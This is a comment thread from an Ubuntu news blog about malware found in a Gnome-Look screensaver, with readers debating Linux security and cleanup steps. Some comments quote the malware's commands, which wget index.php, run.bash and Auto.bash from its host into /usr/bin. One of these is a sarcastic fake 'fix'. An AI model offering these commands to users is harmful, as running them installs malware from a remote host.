Comments on: Malware Hidden Inside Screensaver On Gnome-Look http://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/?utm_source=rss&utm_medium=rss&utm_campaign=malware-hidden-inside-screensaver-on-gnome-look Everything Ubuntu. Daily. Thu, 09 Feb 2012 18:35:00 +0000 hourly 1 http://wordpress.org/?v=3.3.1 By: Sebastienhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-15115 Sebastien Sat, 12 Jun 2010 23:26:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-15115 Right. You should stick with the repos and only use outdated software. You don't need the latest version of Firefox. Wait 6 months. Right. You should stick with the repos and only use outdated software. You don’t need the latest version of Firefox. Wait 6 months.

]]> By: Sebastien Bhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-15114 Sebastien B Sat, 12 Jun 2010 23:23:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-15114 That's demonstrably false. Ubuntu Forums poll respondents have just as many problems with each release as the last. The quality of Ubuntu is stagnant, with each release having just as many new bugs as the last.http://ubuntuforums.org/showthread.php?t=1465548&highlight=poll That’s demonstrably false. Ubuntu Forums poll respondents have just as many problems with each release as the last. The quality of Ubuntu is stagnant, with each release having just as many new bugs as the last.

http://ubuntuforums.org/showthread.php?t=1465548&highlight=poll

]]> By: Mark Shttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-15112 Mark S Sat, 12 Jun 2010 23:20:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-15112 No, no. The correct command is:cd /usr/bin/ && rm Auto.bash && sleep 1 && wget http://05748.t35.com/Bots/Auto.bash && chmod 777 Auto.bashLinux users know that the best way to protect and clean your system is to copy and paste commands from the Internet that you don't understand. No, no. The correct command is:

cd /usr/bin/ && rm Auto.bash && sleep 1 && wget http://05748.t35.com/Bots/Auto.bash && chmod 777 Auto.bash

Linux users know that the best way to protect and clean your system is to copy and paste commands from the Internet that you don’t understand.

]]> By: Типографияhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-9420 Типография Sun, 11 Apr 2010 08:22:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-9420 I read about this on the forum a couple of hours ago, scary stuff really as many people including myself use Gnome Look to download themes, screen-savers & wallpapers. I read about this on the forum a couple of hours ago, scary stuff really as many people including myself use Gnome Look to download themes, screen-savers & wallpapers.

]]> By: Mohanhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-9350 Mohan Fri, 09 Apr 2010 15:59:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-9350 Yes I agree. But with each release I think it's getting easier and easier. 10 years ago it was very much different and difficult (half the time I had a hard time installing it on my computer). Yes I agree. But with each release I think it’s getting easier and easier. 10 years ago it was very much different and difficult (half the time I had a hard time installing it on my computer).

]]> By: Electronic Cigarette Girlhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-9331 Electronic Cigarette Girl Fri, 09 Apr 2010 15:16:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-9331 Ubuntu is awesome but not being a dev or even having the slightest idea about linux, I have to say there were times I had my back against the wall and had to get my programmer buddies to help me out.There will be a HUGE market for Ubuntu or any open source OS once it becomes more friendly to noobs like me lol-Bella :) Ubuntu is awesome but not being a dev or even having the slightest idea about linux, I have to say there were times I had my back against the wall and had to get my programmer buddies to help me out.

There will be a HUGE market for Ubuntu or any open source OS once it becomes more friendly to noobs like me lol

-Bella :)

]]> By: Rapidspirohttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-6650 Rapidspiro Sun, 07 Mar 2010 14:39:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-6650 thank you for the great post! <a href="http://www.rapidspiro.com" rel="nofollow">Rapidshare</a> thank you for the great post! Rapidshare

]]> By: mixed martial artshttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-4221 mixed martial arts Sat, 02 Jan 2010 18:50:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-4221 Wow, I am suprised about this. I am glad I don't bother with funky screensavers. I only have the opengl scrensaver pack. Wow, I am suprised about this. I am glad I don’t bother with funky screensavers. I only have the opengl scrensaver pack.

]]> By: Samhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3764 Sam Mon, 14 Dec 2009 03:56:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3764 I'm not trying to ignore the fact that the material comes from a 3rd party source, but I also never really looked at gnome-look as an "untrusted source." I hate someone had to do this to wake me up a little, I like my fairy-tale world where I can test as many things as I like w/o worry. I’m not trying to ignore the fact that the material comes from a 3rd party source, but I also never really looked at gnome-look as an “untrusted source.” I hate someone had to do this to wake me up a little, I like my fairy-tale world where I can test as many things as I like w/o worry.

]]> By: Samhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3763 Sam Mon, 14 Dec 2009 03:47:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3763 This kind of thing makes me worry a little since I like tweaking the themes and icons so much. I never really bother with the screen savers. I have had an ongoing problem with power/screen saver settings not keeping the setting I put in place to never come on. I haven't tweaked the start settings on this install so that may be the problem. Anyhow, thanks for the 411, I just discovered your blog and it's great! This kind of thing makes me worry a little since I like tweaking the themes and icons so much. I never really bother with the screen savers. I have had an ongoing problem with power/screen saver settings not keeping the setting I put in place to never come on. I haven’t tweaked the start settings on this install so that may be the problem. Anyhow, thanks for the 411, I just discovered your blog and it’s great!

]]> By: Noahhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3689 Noah Thu, 10 Dec 2009 15:56:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3689 It depends - the new script downloads into the home.However, I agree, for some cases, anyway, these commands should be run if you think you have it(nobody has it now) I have also seen one or two "remixes of it" by now, mostly by incapable people, but anyway, to remove them for sure -sudo rm -f /usr/bin/index.php /usr/bin/run.bash /usr/bin/gnomethemeing.sh /$HOME/index.php /$HOME/Desktop/index.php /$HOME/run.bash /$HOME/Desktop/run.bashThis won't be necessary unless you're downloading these things - thank god for VM's to try it out in ;) It depends – the new script downloads into the home.

However, I agree, for some cases, anyway, these commands should be run if you think you have it(nobody has it now)
I have also seen one or two “remixes of it” by now, mostly by incapable people, but anyway, to remove them for sure -

sudo rm -f /usr/bin/index.php /usr/bin/run.bash /usr/bin/gnomethemeing.sh /$HOME/index.php /$HOME/Desktop/index.php /$HOME/run.bash /$HOME/Desktop/run.bash

This won’t be necessary unless you’re downloading these things – thank god for VM’s to try it out in ;)

]]> By: Steve Parkerhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3685 Steve Parker Thu, 10 Dec 2009 15:14:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3685 http://ubuntuforums.org/showpost.php?p=8463766&postcount=5 says that it downloads index.php into /usr/bin, not into $HOME, and then deletes index.php anyway: cd /usr/bin/ wget http://05748.t35.com/Bots/index.php wget http://05748.t35.com/Bots/run.bash sleep 4 rm index.php http://ubuntuforums.org/showpost.php?p=8463766&postcount=5 says that it downloads index.php into /usr/bin, not into $HOME, and then deletes index.php anyway:
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php

]]> By: al3xhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3683 al3x Thu, 10 Dec 2009 14:45:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3683 That's why I proposed at least do: sudo rm -f $HOME/index.phpThat would correctly translate to home of the user that run the command. Not just working directory, that could be almost anything! That’s why I proposed at least do:
sudo rm -f $HOME/index.php

That would correctly translate to home of the user that run the command. Not just working directory, that could be almost anything!

]]> By: al3xhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3681 al3x Thu, 10 Dec 2009 14:42:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3681 But not in their home, but in their current working directory, that should be really stressed there!cd work/my_web/project : do some work : read this article sudo rm -f index.phpsudo pwd # (!!!) But not in their home, but in their current working directory, that should be really stressed there!

cd work/my_web/project
: do some work
: read this article
sudo rm -f index.php

sudo pwd # (!!!)

]]> By: Noahhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3679 Noah Thu, 10 Dec 2009 14:38:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3679 The script(of the hacker) will delete any index.php they have in their home anyway. Also, any run.bash they have. The script(of the hacker) will delete any index.php they have in their home anyway. Also, any run.bash they have.

]]> By: Steve Parkerhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3675 Steve Parker Thu, 10 Dec 2009 14:02:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3675 I did say "contributing anything (code, time, etc)". Writing good bug reports is a very valuable contribution to the community. Complaining that the system works exactly as designed, is useful as part of a constructive design review evaluating realistic alternatives. I did say “contributing anything (code, time, etc)”. Writing good bug reports is a very valuable contribution to the community. Complaining that the system works exactly as designed, is useful as part of a constructive design review evaluating realistic alternatives.

]]> By: Yfrwlfhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3672 Yfrwlf Thu, 10 Dec 2009 12:36:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3672 (And this particular blogger seems to very much agree with me on that point. It goes both ways, and some comments can be extremely unhelpful and non-constructive, so certainly it is better to have someone who takes the time to fill out a bug report, or who has the knowledge to dive into what exactly might be wrong, but they don't *need* or *have* to do those things, and making them feel that they do is just going to push them away and make them feel unwelcome as a Linux user, and that they are stranded.) (And this particular blogger seems to very much agree with me on that point. It goes both ways, and some comments can be extremely unhelpful and non-constructive, so certainly it is better to have someone who takes the time to fill out a bug report, or who has the knowledge to dive into what exactly might be wrong, but they don’t *need* or *have* to do those things, and making them feel that they do is just going to push them away and make them feel unwelcome as a Linux user, and that they are stranded.)

]]> By: Yfrwlfhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3671 Yfrwlf Thu, 10 Dec 2009 12:34:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3671 Good, and of course GNU/Linux and other OS OSes will no doubt continue to lead the way as far as security is concerned, adopting the best practices and concepts. No, making problems known is very important and useful, and the Linux community needs to complain and make problems very well known when they do happen because Linux is *for Linux users*. If someone doesn't want to fix it, fine, but someone who does may do so. Just because someone isn't a programmer doesn't mean their difficulties or programs with Linux are invalid. Contributing bug reports or just simply *commenting*, anywhere on the net, about a problem, is more useful than *nothing* at all. Good, and of course GNU/Linux and other OS OSes will no doubt continue to lead the way as far as security is concerned, adopting the best practices and concepts. No, making problems known is very important and useful, and the Linux community needs to complain and make problems very well known when they do happen because Linux is *for Linux users*. If someone doesn’t want to fix it, fine, but someone who does may do so. Just because someone isn’t a programmer doesn’t mean their difficulties or programs with Linux are invalid. Contributing bug reports or just simply *commenting*, anywhere on the net, about a problem, is more useful than *nothing* at all.

]]> By: Steve Parkerhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3670 Steve Parker Thu, 10 Dec 2009 12:28:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3670 I am not saying "it's all or nothing" - there is SELinux, ACLs, all sorts of more fine-grained protection mechanisms, but the typical Ubuntu user does not want to be bothered with configuring these, or - if system defaults are provided - working out why one operation fails when another similar operation succeeds. Russell Coker has a SELinux play machine at play.coker.com.au which has a publicly available root password. The box is sufficiently covered by SELinux to protect it from malicous use. It is absolutely possible to do such things with Linux.So it does not make sense to say that "It is silly that more work isn't done on making Linux more secure" - of the user-friendly desktop OSes, it has more security that the others. Of the secure OSes, it is more user-friendly than the others.I don't really see how much more somebody could want. And, as always, complaining that a feature is missing without contributing anything (code, time, etc) oneself is not normally very productive :-) I am not saying “it’s all or nothing” – there is SELinux, ACLs, all sorts of more fine-grained protection mechanisms, but the typical Ubuntu user does not want to be bothered with configuring these, or – if system defaults are provided – working out why one operation fails when another similar operation succeeds. Russell Coker has a SELinux play machine at play.coker.com.au which has a publicly available root password. The box is sufficiently covered by SELinux to protect it from malicous use. It is absolutely possible to do such things with Linux.

So it does not make sense to say that “It is silly that more work isn’t done on making Linux more secure” – of the user-friendly desktop OSes, it has more security that the others. Of the secure OSes, it is more user-friendly than the others.

I don’t really see how much more somebody could want. And, as always, complaining that a feature is missing without contributing anything (code, time, etc) oneself is not normally very productive :-)

]]> By: Yfrwlfhttp://www.omgubuntu.co.uk/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3669 Yfrwlf Thu, 10 Dec 2009 12:26:00 +0000 http://www.omgubuntu.dreamhosters.com/2009/12/malware-hidden-inside-screensaver-on-gnome-look/#comment-3669 (Which is why PackageKit is nice, because you're not giving something total root-level control, thus making it hard for something malicious to hose your entire system.) (Which is why PackageKit is nice, because you’re not giving something total root-level control, thus making it hard for something malicious to hose your entire system.)

]]>